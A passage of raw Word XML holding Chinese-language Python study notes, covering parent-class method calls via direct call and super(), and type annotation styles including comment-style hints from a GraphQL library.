      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：直接调用未绑定的父类方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A5115" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3885875E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Base(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6FAD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def greet(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1CDD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('hi,I am Base')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547292BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A742A23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class A(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65815382" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def greet(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D976A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Base.greet(self)  #</w:t>
      </w:r>
      <w:r>
        <w:t>通过父类</w:t>
      </w:r>
      <w:r>
        <w:t>Base</w:t>
      </w:r>
      <w:r>
        <w:t>直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>greet</w:t>
      </w:r>
      <w:r>
        <w:t>方法，并把</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60569AA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('hi,I am A')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75777D50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040F49F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a=A()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59948155" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a.greet()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31329177" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C03582B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A76F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class Animal(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54919ED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, name):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71878D26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name = name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783ECBFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def greet(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C247304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Hello, I am %s.' % self.name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D2CA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class Dog(Animal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86F875" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def greet(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F668A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        super(Dog, self).greet()  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用父类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Animal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>greet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619F22A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('WangWang...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BF5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C06F77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d=Dog("xiaohuang")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75810D75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d.greet()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE2A8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E3568A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7BB496" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCBD122" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F22DBE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075AB22B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D71C428" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc159779869"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标注复杂类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w14:paraId="507F16A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36943878" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://zhuanlan.zhihu.com/p/148398315</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47117B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14769D3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>中声明了类型不意味着初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，标准写法为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AE2E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EDB01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L: list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004AC93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D5CF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>如果仅仅声明但是不进行初始化，会报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC365B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4921E0FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如，在某个类中，我要对某个类型进行类型的标注及初始化如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C13D00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，不论是函数后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识函数的返回值，或者是如下的标注初始化，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类型标注都是不严格的，只是用于人类阅读，但是对代码本身具体使用了什么类型是没有影响的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E02D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CFC3C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标注的类型必须是本模块中可以真实存在的类型，但是要注意，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他包中的类为了标注本模块中的传参的类型的话，请注意交叉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9682B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282041CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class GraphQLParseContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78892139" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, globalObjects):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCC7A0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">self.globalObjects: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> = globalObjects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272FF65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.exportToQueryStack = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC81C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def getExportQueryIndent(self) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC96C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return (len(self.exportToQueryStack)+1)*GRAPHQL_TAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB0011" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def checkExportRecursion(self, name) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E38C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是检查是否会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14473C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if name in self.exportToQueryStack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FDC40E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12571F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357F0F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3E51C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2939318C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的库里看到的另一种标注类型的方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EA18D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __init__(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F861F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2D5A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        query,  # type: GraphQLObjectType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A9BB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        mutation=None,  # type: Optional[GraphQLObjectType]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613A81A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        subscription=None,  # type: Optional[GraphQLObjectType]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2495E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        directives=None,  # type: Optional[List[GraphQLDirective]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597C26C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        types=None,  # type: Optional[List[GraphQLNamedType]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A543F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694EB267" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1AFFDC12" wp14:editId="64AA6F16">
            <wp:extent cx="4928235" cy="1506220"/>
            <wp:effectExtent l="0" t="0" r="9525" b="254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37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4928235" cy="1506220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EF822" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了如上图传参通过换行尾随注释的方法，对函数的返回值也可以通过类似的注释来标注：</w:t>
